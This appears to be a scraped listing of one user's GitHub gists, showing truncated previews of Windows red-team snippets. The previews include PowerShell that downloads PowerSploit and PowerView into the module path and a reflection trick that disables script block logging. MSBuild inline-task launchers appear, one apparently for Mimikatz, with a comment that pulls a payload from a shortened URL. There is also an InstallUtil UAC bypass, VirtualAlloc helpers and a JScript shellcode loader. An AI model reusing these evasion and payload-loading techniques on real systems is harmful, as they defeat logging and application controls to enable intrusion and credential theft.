davehardy20

Remove-Module PowerView -ErrorAction SilentlyContinue
Remove-Module PowerUp -ErrorAction SilentlyContinue
$webclient = New-Object System.Net.WebClient
$url = "https://github.com/Veil-Framework/PowerTools/archive/master.zip"
$file = "$($env:TEMP)\PowerTools.zip"
$webclient.DownloadFile($url,$file)
#Unblock-File -Path $file
$targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules"
New-Item -ItemType Directory -Force -Path $targetondisk | out-null
$shell_app=new-object -com shell.application

davehardy20

Remove-Module PowerSploit -ErrorAction SilentlyContinue
$webclient = New-Object System.Net.WebClient
$url = "https://github.com/mattifestation/PowerSploit/archive/master.zip"
$file = "$($env:TEMP)\PowerSploit.zip"
$webclient.DownloadFile($url,$file)
#Unblock-File -Path $file
$targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules"
New-Item -ItemType Directory -Force -Path $targetondisk | out-null
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)

davehardy20

Keybase proof

I hereby claim:

• I am davehardy20 on github.
• I am davehardy20 (https://keybase.io/davehardy20) on keybase.
• I have a public key ASCgZJlcOaliMj7vAQc2qT6UoN5TfANsZY9TzAg2WSAoLgo

To claim this, I am signing this object:

davehardy20

<?xml version="1.0"?>
<command>
<![CDATA[

function Invoke-WMIObfuscatedPSCommand
function invoke-bypass
{
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetField"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0

davehardy20

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml -->
  <!-- Populate the Env Var like this or many other ways: -->
  <!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') -->
  <!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered -->
  <!-- This is just a simple example... MSBuild is a rich scripting engine with lots of abiltiy to customize the build process -->
  <Target Name="Hello">
    <SharpLauncher >
    </SharpLauncher>

davehardy20

using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass

davehardy20

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
  <Target Name="Hello">
    <SharpLauncher >
    </SharpLauncher>
  </Target>
  <UsingTask
    TaskName="SharpLauncher"
    TaskFactory="CodeTaskFactory"

davehardy20

<#
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
#>

function Invoke-VirtualAlloc {
    Param (
        [IntPtr] $lpAddress,
        [UInt32] $dwSize,
        [UInt32] $flAllocationType,

davehardy20

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;

namespace Export
{
    class Test
    {

davehardy20

import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
 
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js